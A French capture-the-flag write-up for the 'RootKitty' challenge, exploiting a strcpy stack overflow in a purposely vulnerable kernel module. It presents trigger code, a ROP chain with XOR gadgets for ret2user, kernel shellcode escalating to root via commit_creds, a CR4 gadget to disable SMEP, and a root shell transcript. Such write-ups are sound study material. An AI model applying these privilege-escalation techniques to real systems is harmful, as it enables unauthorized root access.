# RootKitty (500 pts)

Il y a déjà d'excellent writeups sur ce challenge. Simples et efficaces! De mon côté j'ai cependant été un peu plus loin, en allant jusqu'à exploit complet.

## Reconnaissance

Ce challenge s'appuie sur Kernel module nommé "ecsc". Après une rapide analyse du `ecsc.ko` on en comprend rapidement le fonctionnement.

Ce module hook les syscalls suivant à son initialisation:
 - `lstat` 
 - `getdents`
 - `getdents64`

Un rapide coup d'oeil à ces fonctions nous montrent un potentiel stack overflow due à un `strcpy()` dans la fonction `getdents()` qui est principalement utilisée pour le listing des répertoires.

En règle générale, je trouve les exploitations de `strcpy` difficile, car elles interdisent le `null` byte et que toutes les addresses userland commence par un octet à `null`. Mais dans le kernel, c'est une autre histoire. Les addresses commencent toutes par `0xff` ce qui rend son exploitation plus simple.

A priori, le `strcpy` à lieu lorsqu'on applique `getdents()` sur un répertoire avec un fichier préfixé par `ecsc__flag_`.

Un rapide test nous permet de le confirmer en déclenchant un kernel panic.

```console
cd /home/ctf
touch ecsc_flag_XXXXXXX....XXX
ls
```

Ces quelques lignes suffisent à reproduire ce comportement en C:
```C
  printf("[.] Create file\n");
  open(filename, O_WRONLY|O_CREAT|O_NOCTTY|O_NONBLOCK, 0666);  // filename start with ecsc_flag_<padding><ROP chain>

  printf("[?] Trigger vulnerability\n");
  fd = open("/home/ctf", O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC);
  syscall(SYS_getdents, fd, getdents_buff, 1024)
```

On constate rapidement que l'on peut prendre le contrôle de RIP.
Aussi on notera:
 - Une randomisation de quelques octets des adresses kernel à chaque boot.
 - Pas de KPTI (pas de contexte switching entre l'espace utilisateur et l'espace kernel)
 - Pas de SMAP (protection d'accès aux mémoires des rings supérieures) 
 - Pas de SMEP (protection d'execution sur des espaces mémoires de rings supérieures)

## La solution simple

La solution simple consiste à simplement désactiver le kernel module avec une chaine de ROP appelant:

```
 - cleanup_module()
 - sys_exit()
```

Cette solution est élégante et efficace! 

**Mais quand on joue en hors catégorie on PWN!**

## Alors comment PWNer?

Un premier exemple, consiste à faire jumper RIP vers une addresse userland et ainsi profiter de l'absence de SMEP. Cette technique s'appelle le `ret2user`, même si dans notre cas nous n'utiliserons pas l'intruction `ret`.

On maitrise ensuite totalement le flux d'instruction exécuté en ring0. On est en capacité de construire une payload pour devenir `root`.

**Beh oui, mais comment tu fais pour jumper vers une adresse userland si tu n'as pas le droit aux null bytes? Hein?**

L'astuce est d'utiliser un gadget de XOR dans le noyau. En Xorant un registre par lui-même on le set à `0x0`. En utilisant cette propriété on peut affecter n'importe quelle valeure à un registre et effectuer un `call` dessus.

La chaine de ROP suivante permet de setter le registre à l'adresse de notre fonction `shellcode` et l'appeler:
```C
    0xffffffff8101c251 + KASLR_OFFSET, //: pop rax ; ret
    0x5555555555555555 ^ (long) shellcode,
    0xffffffff811cc22e + KASLR_OFFSET, //: pop rcx ; ret
    0x5555555555555555 ,
    0xffffffff812c9efc + KASLR_OFFSET, //: xor rax, rcx ; ret
    0xffffffff8119d378 + KASLR_OFFSET  //: xor esi, esi ; call rax
```

La fonction shellcode peut ensuite exécuter ce que l'on veut au niveau kernel. Un exemple simple consisterait à lancer une commande `shell` avec la fonction noyau `call_usermodehelper()`.

```C
#define CALL_USERMODEHELPER 0xFFFFFFFF81047490
#define MSLEEP 0xFFFFFFFF81066070

typedef int __attribute__((regparm(3))) (* _call_usermodehelper) (const char * path, char ** argv, char ** envp, int wait);
typedef void (*_msleep) (unsigned int msecs);

_call_usermodehelper call_usermodehelper = (CALL_USERMODEHELPER + KASLR_OFFSET);
_msleep msleep = (MSLEEP + KASLR_OFFSET);

void shellcode(){
  char *argv[] = { "/bin/sh", "-c", "<wathever command here>", NULL};
  char *env[] = { "PATH=/bin:/usr/bin", NULL};
  call_usermodehelper(argv[0], argv, env, 1);
  for(;;){
    msleep(100);
  }
}
```

Cette commande peut vous permettre d'ouvrir un accès root persistant. Elle peut par exemple:
 - changer le password root
 - affecter un S-UID bit à un binaire
 - ouvrir un bindshell (ou reverseshell)
 - etc.

## Pour la beauté du geste

Voici une façon d'aller jusqu'à l'obtention d'un shell root `#` **avec une méthode à la papa!**

Je vais profiter de ce write-up, pour montrer une alternative à l'approche traditionnelle consistant en l'utilisation de l'intruction `iret`. L'usage de cette instruction implique la compréhension de plusieurs concept. Afin de simplifier les choses je vais démontrer une autre méthode. 

L'idée est de faire affecter à un processus parent les credential root par le fils (qui sera l'exploit).

Le principe est donc de forker avant l'exploitation. L'exploit aura pour objectif d'affecter les credentials root au processus parent.

```C
  pid = getpid();
  printf("[.] PID %d\n",pid);

  if (fork()==0){
    exploit(); // Set ROOT to parent
  } else {
    sleep(1);
    if(getuid()==0){
      printf("[+] Root ^_^\n");
    }
    system("/bin/sh -i");
  }
```

Une fois le ret2user effectué, la payload suivante suffit à positionner root au parent.
```C
void shellcode(){
  commit_creds(prepare_kernel_cred(0));
  copy_creds(find_task_by_vpid(pid), 0x00000000);
  sys_exit(0);
}
```

A l'execution celà donne.

```console
/ $ /mnt/share/exploit
[.] PID 61
[.] Prepare crafted filename
[.] Create file
[?] Trigger vulnerability
[+] Root ^_^
/ #
/ # id
uid=0(root) gid=0(root)
/ #
```

## Pour conclure

Le ret2user est très puissant. Il suffit que le SMEP soit désactivé et d'avoir le contrôle du registre d'instruction pour l'utiliser. L'absence de SMEP est souvent le cas sur les environnements virutalisés.

Dans certains cas, il est aussi possible de désactiver le SMEP (et le SMAP) grâce à la chaine de ROP en modifiant le registre CR4, par exemple avec le gadget suivant:

```nasm
0xffffffff81002968 : mov cr4, rax ; pop rbp ; ret
```

Cheers, 
Cyrillec
